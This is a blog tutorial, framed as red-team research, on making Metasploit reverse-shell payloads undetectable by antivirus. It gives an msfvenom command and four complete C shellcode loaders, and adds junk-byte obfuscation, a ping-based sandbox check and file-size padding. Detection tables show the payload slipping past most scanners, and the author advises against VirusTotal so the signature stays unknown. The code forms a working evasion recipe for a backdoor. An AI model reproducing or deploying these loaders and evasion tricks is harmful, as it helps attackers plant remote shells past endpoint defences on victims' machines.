go back Home go back Home

FUD malware using Metasploit & C

Antivirus Evasion img

Metasploit is a useful tool that often comes handy while performing penetration testing and red team assessments. It allows us to create payloads in a short time, however, its artifacts often are easily identified and blocked by Antivirus Solutions.

Here I present a simple and fast way to perform Antivirus Evasion. A little C knowledge is needed to understand some of the steps.

The presented approach only works to create a new payload undetected by automatic analysis. For research purposes, we performed analysis using as many free antiviruses as possible. However, it is easy for antivirus software to mark its signature as malicious, therefore you should only analyze your executable with offline antiviruses and should avoid platforms like VirusTotal.

The base template

Use a simple payload to start, I used the command msfvenom -p windows/shell/reverse\_tcpLHOST=192.168.1.166 LPORT=4444 -f C to generate mine. Then simply place it into the C template.

Use the VirtualAlloc() function to create executable space in memory, then using a for loop copy the shellcode in the just created memory space. A the end, cast the pointer to the copied memory to a function and call it.

base_template.c [Show Code]

#define WIN32_LEAN_AND_MEAN
#include 

#define SCSIZE 4096

char payload[SCSIZE] =
	"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"
	"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"
	"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"
	"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"
	"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"
	"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"
	"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"
	"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
	"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"
	"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
	"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"
	"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
	"\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
	"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89"
	"\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
	"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68"
	"\xc0\xa8\x01\xa6\x68\x02\x00\x11\x5c\x89\xe6"
	"\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
	"\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99"
	"\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e"
	"\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a"
	"\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
	"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10"
	"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff"
	"\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
	"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68"
	"\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f"
	"\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5"
	"\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff"
	"\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
	"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
						
int main(int argc, char* argv[]){
	void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	char* pp = (char*) p;
	char* x = payload;

	for(int i = 0; i < SCSIZE; i++)
		*pp++ = *x++;

	(*(void (*)()) p)();

	return 0;
}
                

Analyzing this executable with some antivirus gave some bad results.

Antivirus Name Static detection* Full detection
VirusTotal 28/64 28/67
Avast Win32:Swort-S [Trj] Win32:Swort-S [Trj]
AVG Win32:Swort-S [Trj] Win32:Swort-S [Trj]
Avira TR/Meterpreter TR/Meterpreter
BitDefender Generic.RozenaA Generic.RozenaA
Kaspersky Trojan.Win32Generic Trojan.Win32Generic
Malwarebytes No detection No detection
Panda No detection No detection
Windows Def Trojan:Win32/Meterp.gen!C Trojan:Win32/Meterp.gen!C
*To make sure that an AV is detecting something with static analysis, create the executable but remove the shellcode invocation.

Evade Signature-base detection & Static Analysis

It is a common misconception that encrypting a payload using automated tools is sufficient to achieve a good level in antivirus evasion. This is just myth, using encoders that generate polymorphic code could help but usually, even encoders are well known and well detected by antivirus. However, using this them along with their command-line interface’s options might be useful to obtain more control over the generated payload.

In our case, to achieve signature evasion, it was sufficient to use both encoders along with some junk data to make it even harder to match any existing signature.

We generated the new encoded payload using this code. This command creates the desired code without using the byte 0xfa. This characteristic allows us to pollute the shellcode using a bunch of 0xfa, consequently, the end signature is less likely to be already known. Of course, later in the code, while copying the shellcode into the executable space we must make sure to clean it or else it won't execute.

signature_evasion.c [Show Code]

#define WIN32_LEAN_AND_MEAN
#include 

#define SCSIZE 4096

char payload[SCSIZE] =
    "\xda\xcc\xbd\x00\x9e\xd2\xf3\xd9\x74\x24\xfa"
    "\xf4\x5e\x29\xc9\xb1\x93\x31\x6e\x17\x03\xfa"
    "\x6e\x17\x83\xc6\x9a\x30\x06\x1f\x49\x0b\xfa"
    "\x54\x3b\xdb\x28\x7e\x37\xc0\x24\xde\x9c\xfa"
    "\xc1\x74\x53\x61\x17\x72\x5d\x1b\x8c\x78\xfa"
    "\xe3\x4a\xea\xde\x9e\x9b\xce\x53\xc5\x30\xfa"
    "\x3e\xe7\xf9\x89\x45\x86\xd5\x83\x8a\x6b\xfa"
    "\x73\x21\xdd\x56\x8b\xea\x27\xce\x7a\xaf\xfa"
    "\xc3\x3b\xd0\xa9\xef\x35\x79\x25\x12\x11\xfa"
    "\x2c\xd3\x12\x18\xe2\x4a\x24\xab\x84\x43\xfa"
    "\xcf\x82\x48\xeb\x4b\x77\x33\xb7\xb6\x27\xfa"
    "\xb9\xd2\x29\x3f\x3f\xe4\x69\x25\x65\x4e\xfa"
    "\x92\x1d\x8c\x4f\xd5\x1b\x1e\xbb\xd7\x1c\xfa"
    "\x6e\x89\xc3\x39\xc4\xf2\x41\xa9\x5e\x2d\xfa"
    "\xdb\x5a\xa2\xf7\xea\xf3\x7f\xf0\xec\x88\xfa"
    "\xf7\xba\x73\x79\x60\x3e\x06\x05\x6c\x42\xfa"
    "\x5b\x3f\x79\xdf\xa6\x5d\xd9\xf2\x1c\x2f\xfa"
    "\x4a\xc3\x9e\x1d\x50\x8f\x8d\x81\x49\x36\xfa"
    "\x0b\xe3\x9f\x4a\xf5\x74\x6d\x7a\x0b\x86\xfa"
    "\xb1\x3b\x3d\x06\x38\x69\xb9\x53\xe2\x14\xfa"
    "\xea\xe5\xa3\x72\x50\x52\xce\x1e\x3a\x02\xfa"
    "\x10\x5d\xb6\x85\xdb\x99\x48\x9b\xa8\x46\xfa"
    "\x02\x3e\xd3\x64\x11\x6b\x30\xe9\xa3\xad\xfa"
    "\xc6\xe5\x72\xd7\x5d\xc5\x30\xae\xd7\xa0\xfa"
    "\x0f\x66\xcc\xc0\xb1\x36\x79\xea\x08\x2e\xfa"
    "\x5d\x8c\x56\x57\xe7\x07\xe2\x27\xc9\x6b\xfa"
    "\x62\xb4\x79\xb4\x68\xf8\x0f\x17\x74\x5a\xfa"
    "\x32\x4b\x05\xef\x82\xf2\x80\x82\xd9\x4a\xfa"
    "\xd2\xbf\x4c\x90\x80\x92\xd9\x2b\x7f\x73\xfa"
    "\x7a\x44\x38\x9d\xb8\xc9\x38\x78\x0e\xc5\xfa"
    "\x1f\xa7\xdb\x7a\xba\xa2\xbc\x6d\x12\x84\xfa"
    "\x76\x50\x5a\x11\xa2\x4e\x90\x39\x5c\xe0\xfa"
    "\xd5\x9b\x3e\xc8\xdc\x69\x5d\x40\x3e\x96\xfa"
    "\x4b\xdc\xa5\xaf\x42\xdc\x84\xc9\x99\xc5\xfa"
    "\x98\x7a\x2b\x40\x4e\x45\x9c\x7f\xb3\x02\xfa"
    "\xa7\x2d\x2c\x1b\xe7\x93\x11\x98\x48\x00\xfa"
    "\x87\xa1\x22\x08\xce\x88\x7b\xc8\xc5\xb6\xfa"
    "\xce\xde\xfb\xea\x59\x98\x74\x2e\xdd\xd8\xfa"
    "\x55\x9b\xe7\x25\x51\x85\x8b\x79\x20\xb0\xfa"
    "\xd0\xcd\xc2\xda\xdc\x7e\xd3\x28\xcb\x5a\xfa"
    "\xf4\x97\x96\x28\xa2\xe2\xa5\x04\xdc\x9c\xfa"
    "\xe0\x7a\xb5\xd1\x96\xe9\x1c\xbe\x81\x8f\xfa"
    "\xf4\x4f\x6b\xaa\xae\x9b\xd8\x7a\xe4\xe3\xfa"
    "\x7f\xc1\x9f\x53\xc3\xb0\xba\xb4\x50\xd4\xfa"
    "\x08\xf7\xc2\x82\x98\x39\x35\xff\x5d\x93\xfa"
    "\x34\x8d\x31\xaa\xe9\x13\xff\x7d\xf2\x64\xfa"
    "\x3d\x6d\x85\x38\xac\xe1\x4a\x35\x77\x4f\xfa"
    "\x09\xb0\x26\x15\x6c\xc7\x8c\xc0\xe2\x46\xfa"
    "\xa3\x50\x11\xc1\xb2\x2e\xd0\x36\x8d\x65\xfa"
    "\xaa\xbb\xd1\x48\x6e\x39\x09\xbe\x3b\xde\xfa"
    "\x42\x56\x2b\x66\x4f\xfb\x7f\x02\xd1\x32\xfa"
    "\xc0\x81\xce\xb7\xa0\xb2\x2e\x8b\x75\xa7\xfa"
    "\x0d\x2d\x05\xea\x18\x0f\x8c\xb8\x27\x65\xfa"
    "\x5c\x4a\x11\xd3\xa9\xce\x14\xa2\xf9\xe0\xfa"
    "\x22\xbd\xcd\xcf\x88\xeb\x08\x3b\xf6\xda\xfa"
    "\x3b\xe5\xe2\x2b\x38\x6d\xf4\x53\x85\xa8\xfa"
    "\xd7\xaa\x4b\x7b\x6b\x91\x42\xfe\x3c\xa6\xfa"
    "\x5e\x73\x5b\x04\x8b\x94\xd6\xbb\xb9\xa6\xfa"
    "\x37\x1d\x2a\x6d\x58\x0d\x5d\x17\x44\x58\xfa"
    "\x96\x79\x46\xf6\x1e\x94\xa3\xc4\x05\x4c\xfa"
    "\x5b\xbe\x25\x55\x7d\x92\x3d\x32\xf7\xed\xfa"
    "\xe5";
    
int main(int argc, char* argv[]){
    void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    char* pp = (char*) p;
    char* x = payload;

    for(int i = 0; i < SCSIZE; i++){
        char v = *x++;
        if(v != '\xfa')
            *pp++ = v;
    }

    (*(void (*)()) p)();

    return 0;
}                    
                

After performing static analysis evasion we manage to sneak trough a lot of antiviruses.

Antivirus Name Static detection Full detection
VirusTotal 21/66 21/68
Avast No detection No detection
AVG No detection No detection
Avira TR/Meterpreter TR/Meterpreter
BitDefender No detection No detection
Kaspersky No detection No detection
Malwarebytes No detection No detection
Panda No detection No detection
Windows Def No detection Trojan:Win32/Meterp.gen!C

Evade Dynamic analysis

Dynamic analysis is a method of computer program debugging, in this case, done by the Antivirus, which is accomplished by examining the code executing it, usually in a Virtual Machine.

Simulate a whole operating system to evaluate an executable in just a few instants may not always be so easy. The virtual machine may have some flows and we can exploit them to make the application behave differently while analyzed.

I used a really simple function of sandbox detection. It checks the correct execution of the ping command. We both check that the return value is the expected one and that the command execution correctly takes a minimum time to be executed. There are many other way to perform sandbox evasion.

sandbox_evasion.c [Show Code]

#define WIN32_LEAN_AND_MEAN
#include 
#include 
#include 

#define SCSIZE 4096

char payload[SCSIZE] =
    "\xda\xcc\xbd\x00\x9e\xd2\xf3\xd9\x74\x24\xfa"
    "\xf4\x5e\x29\xc9\xb1\x93\x31\x6e\x17\x03\xfa"
    "\x6e\x17\x83\xc6\x9a\x30\x06\x1f\x49\x0b\xfa"
    "\x54\x3b\xdb\x28\x7e\x37\xc0\x24\xde\x9c\xfa"
    "\xc1\x74\x53\x61\x17\x72\x5d\x1b\x8c\x78\xfa"
    "\xe3\x4a\xea\xde\x9e\x9b\xce\x53\xc5\x30\xfa"
    "\x3e\xe7\xf9\x89\x45\x86\xd5\x83\x8a\x6b\xfa"
    "\x73\x21\xdd\x56\x8b\xea\x27\xce\x7a\xaf\xfa"
    "\xc3\x3b\xd0\xa9\xef\x35\x79\x25\x12\x11\xfa"
    "\x2c\xd3\x12\x18\xe2\x4a\x24\xab\x84\x43\xfa"
    "\xcf\x82\x48\xeb\x4b\x77\x33\xb7\xb6\x27\xfa"
    "\xb9\xd2\x29\x3f\x3f\xe4\x69\x25\x65\x4e\xfa"
    "\x92\x1d\x8c\x4f\xd5\x1b\x1e\xbb\xd7\x1c\xfa"
    "\x6e\x89\xc3\x39\xc4\xf2\x41\xa9\x5e\x2d\xfa"
    "\xdb\x5a\xa2\xf7\xea\xf3\x7f\xf0\xec\x88\xfa"
    "\xf7\xba\x73\x79\x60\x3e\x06\x05\x6c\x42\xfa"
    "\x5b\x3f\x79\xdf\xa6\x5d\xd9\xf2\x1c\x2f\xfa"
    "\x4a\xc3\x9e\x1d\x50\x8f\x8d\x81\x49\x36\xfa"
    "\x0b\xe3\x9f\x4a\xf5\x74\x6d\x7a\x0b\x86\xfa"
    "\xb1\x3b\x3d\x06\x38\x69\xb9\x53\xe2\x14\xfa"
    "\xea\xe5\xa3\x72\x50\x52\xce\x1e\x3a\x02\xfa"
    "\x10\x5d\xb6\x85\xdb\x99\x48\x9b\xa8\x46\xfa"
    "\x02\x3e\xd3\x64\x11\x6b\x30\xe9\xa3\xad\xfa"
    "\xc6\xe5\x72\xd7\x5d\xc5\x30\xae\xd7\xa0\xfa"
    "\x0f\x66\xcc\xc0\xb1\x36\x79\xea\x08\x2e\xfa"
    "\x5d\x8c\x56\x57\xe7\x07\xe2\x27\xc9\x6b\xfa"
    "\x62\xb4\x79\xb4\x68\xf8\x0f\x17\x74\x5a\xfa"
    "\x32\x4b\x05\xef\x82\xf2\x80\x82\xd9\x4a\xfa"
    "\xd2\xbf\x4c\x90\x80\x92\xd9\x2b\x7f\x73\xfa"
    "\x7a\x44\x38\x9d\xb8\xc9\x38\x78\x0e\xc5\xfa"
    "\x1f\xa7\xdb\x7a\xba\xa2\xbc\x6d\x12\x84\xfa"
    "\x76\x50\x5a\x11\xa2\x4e\x90\x39\x5c\xe0\xfa"
    "\xd5\x9b\x3e\xc8\xdc\x69\x5d\x40\x3e\x96\xfa"
    "\x4b\xdc\xa5\xaf\x42\xdc\x84\xc9\x99\xc5\xfa"
    "\x98\x7a\x2b\x40\x4e\x45\x9c\x7f\xb3\x02\xfa"
    "\xa7\x2d\x2c\x1b\xe7\x93\x11\x98\x48\x00\xfa"
    "\x87\xa1\x22\x08\xce\x88\x7b\xc8\xc5\xb6\xfa"
    "\xce\xde\xfb\xea\x59\x98\x74\x2e\xdd\xd8\xfa"
    "\x55\x9b\xe7\x25\x51\x85\x8b\x79\x20\xb0\xfa"
    "\xd0\xcd\xc2\xda\xdc\x7e\xd3\x28\xcb\x5a\xfa"
    "\xf4\x97\x96\x28\xa2\xe2\xa5\x04\xdc\x9c\xfa"
    "\xe0\x7a\xb5\xd1\x96\xe9\x1c\xbe\x81\x8f\xfa"
    "\xf4\x4f\x6b\xaa\xae\x9b\xd8\x7a\xe4\xe3\xfa"
    "\x7f\xc1\x9f\x53\xc3\xb0\xba\xb4\x50\xd4\xfa"
    "\x08\xf7\xc2\x82\x98\x39\x35\xff\x5d\x93\xfa"
    "\x34\x8d\x31\xaa\xe9\x13\xff\x7d\xf2\x64\xfa"
    "\x3d\x6d\x85\x38\xac\xe1\x4a\x35\x77\x4f\xfa"
    "\x09\xb0\x26\x15\x6c\xc7\x8c\xc0\xe2\x46\xfa"
    "\xa3\x50\x11\xc1\xb2\x2e\xd0\x36\x8d\x65\xfa"
    "\xaa\xbb\xd1\x48\x6e\x39\x09\xbe\x3b\xde\xfa"
    "\x42\x56\x2b\x66\x4f\xfb\x7f\x02\xd1\x32\xfa"
    "\xc0\x81\xce\xb7\xa0\xb2\x2e\x8b\x75\xa7\xfa"
    "\x0d\x2d\x05\xea\x18\x0f\x8c\xb8\x27\x65\xfa"
    "\x5c\x4a\x11\xd3\xa9\xce\x14\xa2\xf9\xe0\xfa"
    "\x22\xbd\xcd\xcf\x88\xeb\x08\x3b\xf6\xda\xfa"
    "\x3b\xe5\xe2\x2b\x38\x6d\xf4\x53\x85\xa8\xfa"
    "\xd7\xaa\x4b\x7b\x6b\x91\x42\xfe\x3c\xa6\xfa"
    "\x5e\x73\x5b\x04\x8b\x94\xd6\xbb\xb9\xa6\xfa"
    "\x37\x1d\x2a\x6d\x58\x0d\x5d\x17\x44\x58\xfa"
    "\x96\x79\x46\xf6\x1e\x94\xa3\xc4\x05\x4c\xfa"
    "\x5b\xbe\x25\x55\x7d\x92\x3d\x32\xf7\xed\xfa"
    "\xe5";

int sandboxDetected(){
    time_t startPing, endPing;
    time(&startPing);
    if(
        system("ping -n 1 -w 1500 10.0.0.1") != 1
    )
        return 1;
    time(&endPing);

    if(
        difftime(endPing, startPing) < 1
    )
        return 1;
    return 0;
}

int main(int argc, char* argv[]){

    if(sandboxDetected()) return 0;

    void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    char* pp = (char*) p;
    char* x = payload;

    for(int i = 0; i < SCSIZE; i++){
        char v = *x++;
        if(v != '\xfa')
            *pp++ = v;
    }

    (*(void (*)()) p)();

    return 0;
}              
                

Using this function we've been able to evade Windows Defender sandbox and some of the sandbox of VirusTotal.

Antivirus Name Full detection
VirusTotal 12/66
Avast No detection
AVG No detection
Avira TR/Meterpreter
BitDefender No detection
Kaspersky No detection
Malwarebytes No detection
Panda No detection
Windows Def No detection

Conclusions

In the end, only Avira seemed to still be able to detect the file. After some investigation, we noticed that it was happening because small files are sent onto the cloud for further analysis.

Increasing the file size is enough to bypass even this last check.

final_executable.c [Show Code]

#define WIN32_LEAN_AND_MEAN
#include 
#include 
#include 

#define SCSIZE 4096
#define MIN_FILE_LEN 7050000

char sizeManagmentArray[MIN_FILE_LEN] = "a";

char payload[SCSIZE] =
    "\xda\xcc\xbd\x00\x9e\xd2\xf3\xd9\x74\x24\xfa"
    "\xf4\x5e\x29\xc9\xb1\x93\x31\x6e\x17\x03\xfa"
    "\x6e\x17\x83\xc6\x9a\x30\x06\x1f\x49\x0b\xfa"
    "\x54\x3b\xdb\x28\x7e\x37\xc0\x24\xde\x9c\xfa"
    "\xc1\x74\x53\x61\x17\x72\x5d\x1b\x8c\x78\xfa"
    "\xe3\x4a\xea\xde\x9e\x9b\xce\x53\xc5\x30\xfa"
    "\x3e\xe7\xf9\x89\x45\x86\xd5\x83\x8a\x6b\xfa"
    "\x73\x21\xdd\x56\x8b\xea\x27\xce\x7a\xaf\xfa"
    "\xc3\x3b\xd0\xa9\xef\x35\x79\x25\x12\x11\xfa"
    "\x2c\xd3\x12\x18\xe2\x4a\x24\xab\x84\x43\xfa"
    "\xcf\x82\x48\xeb\x4b\x77\x33\xb7\xb6\x27\xfa"
    "\xb9\xd2\x29\x3f\x3f\xe4\x69\x25\x65\x4e\xfa"
    "\x92\x1d\x8c\x4f\xd5\x1b\x1e\xbb\xd7\x1c\xfa"
    "\x6e\x89\xc3\x39\xc4\xf2\x41\xa9\x5e\x2d\xfa"
    "\xdb\x5a\xa2\xf7\xea\xf3\x7f\xf0\xec\x88\xfa"
    "\xf7\xba\x73\x79\x60\x3e\x06\x05\x6c\x42\xfa"
    "\x5b\x3f\x79\xdf\xa6\x5d\xd9\xf2\x1c\x2f\xfa"
    "\x4a\xc3\x9e\x1d\x50\x8f\x8d\x81\x49\x36\xfa"
    "\x0b\xe3\x9f\x4a\xf5\x74\x6d\x7a\x0b\x86\xfa"
    "\xb1\x3b\x3d\x06\x38\x69\xb9\x53\xe2\x14\xfa"
    "\xea\xe5\xa3\x72\x50\x52\xce\x1e\x3a\x02\xfa"
    "\x10\x5d\xb6\x85\xdb\x99\x48\x9b\xa8\x46\xfa"
    "\x02\x3e\xd3\x64\x11\x6b\x30\xe9\xa3\xad\xfa"
    "\xc6\xe5\x72\xd7\x5d\xc5\x30\xae\xd7\xa0\xfa"
    "\x0f\x66\xcc\xc0\xb1\x36\x79\xea\x08\x2e\xfa"
    "\x5d\x8c\x56\x57\xe7\x07\xe2\x27\xc9\x6b\xfa"
    "\x62\xb4\x79\xb4\x68\xf8\x0f\x17\x74\x5a\xfa"
    "\x32\x4b\x05\xef\x82\xf2\x80\x82\xd9\x4a\xfa"
    "\xd2\xbf\x4c\x90\x80\x92\xd9\x2b\x7f\x73\xfa"
    "\x7a\x44\x38\x9d\xb8\xc9\x38\x78\x0e\xc5\xfa"
    "\x1f\xa7\xdb\x7a\xba\xa2\xbc\x6d\x12\x84\xfa"
    "\x76\x50\x5a\x11\xa2\x4e\x90\x39\x5c\xe0\xfa"
    "\xd5\x9b\x3e\xc8\xdc\x69\x5d\x40\x3e\x96\xfa"
    "\x4b\xdc\xa5\xaf\x42\xdc\x84\xc9\x99\xc5\xfa"
    "\x98\x7a\x2b\x40\x4e\x45\x9c\x7f\xb3\x02\xfa"
    "\xa7\x2d\x2c\x1b\xe7\x93\x11\x98\x48\x00\xfa"
    "\x87\xa1\x22\x08\xce\x88\x7b\xc8\xc5\xb6\xfa"
    "\xce\xde\xfb\xea\x59\x98\x74\x2e\xdd\xd8\xfa"
    "\x55\x9b\xe7\x25\x51\x85\x8b\x79\x20\xb0\xfa"
    "\xd0\xcd\xc2\xda\xdc\x7e\xd3\x28\xcb\x5a\xfa"
    "\xf4\x97\x96\x28\xa2\xe2\xa5\x04\xdc\x9c\xfa"
    "\xe0\x7a\xb5\xd1\x96\xe9\x1c\xbe\x81\x8f\xfa"
    "\xf4\x4f\x6b\xaa\xae\x9b\xd8\x7a\xe4\xe3\xfa"
    "\x7f\xc1\x9f\x53\xc3\xb0\xba\xb4\x50\xd4\xfa"
    "\x08\xf7\xc2\x82\x98\x39\x35\xff\x5d\x93\xfa"
    "\x34\x8d\x31\xaa\xe9\x13\xff\x7d\xf2\x64\xfa"
    "\x3d\x6d\x85\x38\xac\xe1\x4a\x35\x77\x4f\xfa"
    "\x09\xb0\x26\x15\x6c\xc7\x8c\xc0\xe2\x46\xfa"
    "\xa3\x50\x11\xc1\xb2\x2e\xd0\x36\x8d\x65\xfa"
    "\xaa\xbb\xd1\x48\x6e\x39\x09\xbe\x3b\xde\xfa"
    "\x42\x56\x2b\x66\x4f\xfb\x7f\x02\xd1\x32\xfa"
    "\xc0\x81\xce\xb7\xa0\xb2\x2e\x8b\x75\xa7\xfa"
    "\x0d\x2d\x05\xea\x18\x0f\x8c\xb8\x27\x65\xfa"
    "\x5c\x4a\x11\xd3\xa9\xce\x14\xa2\xf9\xe0\xfa"
    "\x22\xbd\xcd\xcf\x88\xeb\x08\x3b\xf6\xda\xfa"
    "\x3b\xe5\xe2\x2b\x38\x6d\xf4\x53\x85\xa8\xfa"
    "\xd7\xaa\x4b\x7b\x6b\x91\x42\xfe\x3c\xa6\xfa"
    "\x5e\x73\x5b\x04\x8b\x94\xd6\xbb\xb9\xa6\xfa"
    "\x37\x1d\x2a\x6d\x58\x0d\x5d\x17\x44\x58\xfa"
    "\x96\x79\x46\xf6\x1e\x94\xa3\xc4\x05\x4c\xfa"
    "\x5b\xbe\x25\x55\x7d\x92\x3d\x32\xf7\xed\xfa"
    "\xe5";

int sandboxDetected(){
    time_t startPing, endPing;
    time(&startPing);
    if(
        system("ping -n 1 -w 1500 10.0.0.1") != 1
    )
        return 1;
    time(&endPing);

    if(
        difftime(endPing, startPing) < 1
    )
        return 1;
    return 0;
}

int main(int argc, char* argv[]){

    if(sandboxDetected()) return 0;

    void* p = VirtualAlloc(NULL, SCSIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    char* pp = (char*) p;
    char* x = payload;

    for(int i = 0; i < SCSIZE; i++){
        char v = *x++;
        if(v != '\xfa')
            *pp++ = v;
    }

    (*(void (*)()) p)();

    return 0;
}
                

Finally we remain with an executable that opens a reverse shell completely ignored by antivirus. Our last modification also improved our score on VirusTotal.

Antivirus Name Full detection
VirusTotal 9/66
Avast No detection
AVG No detection
Avira No detection
BitDefender No detection
Kaspersky No detection
Malwarebytes No detection
Panda No detection
Windows Def No detection

Checkout the full presentation in Italian at this link.

Contact me at lucareccia@hotmail.it